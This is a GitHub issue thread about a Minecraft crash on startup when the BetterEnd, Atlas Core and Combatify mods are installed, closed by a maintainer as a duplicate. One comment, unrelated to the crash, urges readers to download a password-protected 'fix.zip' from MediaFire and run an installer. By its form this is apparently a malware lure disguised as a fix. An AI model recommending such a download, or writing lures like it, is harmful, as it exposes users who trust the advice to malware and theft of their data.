### ISSUE TITLE
Crash on Minecraft startup with BetterEnd installed

### ISSUE THREAD

**Issue by FV214Hardiel** [Alexandra-Myers/Combatify#84] opened 2024-08-28 09:10 UTC
Game doesnt load, 2 crash reports attached:
first with _better-end, atlas-core and combatify_ installed, 
[crash-2024-08-28_11.58.42-client.txt](https://github.com/user-attachments/files/16780972/crash-2024-08-28_11.58.42-client.txt)

second with _only better-end and atlas-core_ installed
[crash-2024-08-28_12.02.40-client.txt](https://github.com/user-attachments/files/16780970/crash-2024-08-28_12.02.40-client.txt)

Game version 1.21
Fabric API v0.102.0+1.21
Fabric Loader 0.16.2

**Comment by chenkeyu123** [comment] 2024-08-28 10:21
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by StunfMC** [comment] 2024-08-28 17:55
Duplicate of #83, please submit log files to that issue.

**Closed by StunfMC** 2024-08-28 17:55 UTC
